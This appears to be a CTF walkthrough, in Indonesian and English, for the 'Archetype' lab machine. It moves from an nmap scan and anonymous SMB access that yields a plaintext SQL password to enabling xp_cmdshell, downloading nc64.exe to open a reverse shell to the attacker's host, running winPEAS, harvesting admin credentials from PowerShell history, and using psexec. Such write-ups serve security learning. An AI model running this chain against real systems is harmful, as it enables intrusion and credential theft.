Archetype
#smbclient #ms-sql-server #impacket
nmap -sV -sC <ip_target>
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-24 15:37 WIB
Nmap scan report for 10.129.106.221
Host is up (0.37s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1078/tcp filtered avocent-proxy
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-01-24T01:47:56
|_Not valid after: 2052-01-24T01:47:56
|_ssl-date: 2022-01-24T01:50:29+00:00; -6h48m24s from scanner time.
10012/tcp filtered unknown
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-01-24T01:50:12
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-23T17:50:14-08:00
| ms-sql-info:
| 10.129.106.221:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_clock-skew: mean: -5h12m23s, deviation: 3h34m41s, median: -6h48m24s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.05 seconds
Port SMB terbuka dan juga Microsoft SQL Server 2017.
- Enumerate SMB dengan
smbclient
smbclient -N -L \\\\<ip_target>
-N : No password
-L : This option allows you to look at what services are available on a server
Akses yang dapat dienumerate backups
smbclient -N \\\\<ip_target>\\backups
smb: \> dir
smb: \> get prod.dtsConfig
cat prod.dtsConfig
<DTSConfiguration>
<DTSConfigurationHeading>
<DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
</DTSConfigurationHeading>
<Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
<ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
</Configuration>
</DTSConfiguration>
Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc
- Enumerate MS-SQL-Server
Impacket tool includes a valueable python script called mssqlclient.py which offers such a functionality.
Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library.
https://github.com/SecureAuthCorp/impacket
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip3 install .
# OR:
sudo python3 setup.py install
# In case you are missing some modules:
pip3 install -r requirements.txt
semua file yang akan digunakan diambil dari folder impacket
python3 mssqlclient.py -h
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
SQL> help
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
cek role yang kita miliki di dalam server
SQL> SELECT is_srvrolemember('sysadmin');
cek aktivasi xp_cmdshell, karena biasanya disable by default
SQL> EXEC xp_cmdshell 'net user';
mengaktifkan xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; - Enabling the sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
cek
SQL> xp_cmdshell "whoami"
- Reverse Shell
konsep
1. upload nc64.exe ke server
2. eksekusi cmd.exe di listener
http server (local) -> server -> listener (local)
buka terminal
sudo python3 -m http.server 80
new terminal tab
sudo nc -lvnp 443
akan menggunakan powershell karena fiturnya lebih banyak, sehingga powershell -c command tiap eksekusi
SQL> xp_cmdshell "powershell -c pwd"
flag user
C:\Users\sql_svc\Desktop
menempatkan pada directory yang memungkinkan user biasa write
SQL> xp_cmdshell "powershell -c dir C:\Users"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://<ip_local>/nc64.exe -outfile nc64.exe"
*jangan lupa untuk allow port 80 pada local (linux ufw):
sudo ufw allow 80
bind cmd.exe ke listener local
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe <ip_local> 443"
- Previlege Escalation
Windows Previleges Escalation, tools winPeas
kirim ke target mesin
powershell
wget http://10.10.14.9/winPEASx64.exe -outfile winPEASx64.exe
run
PS C:\Users\sql_svc\Downloads> .\winPEASx64.exe
buka listener
cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
type ConsoleHost_history.txt
diperoleh user dan password dari admin
buka terminal baru
python3 psexec.py administrator@{TARGET_IP}
flag root
C:\Users\Administrator\Desktop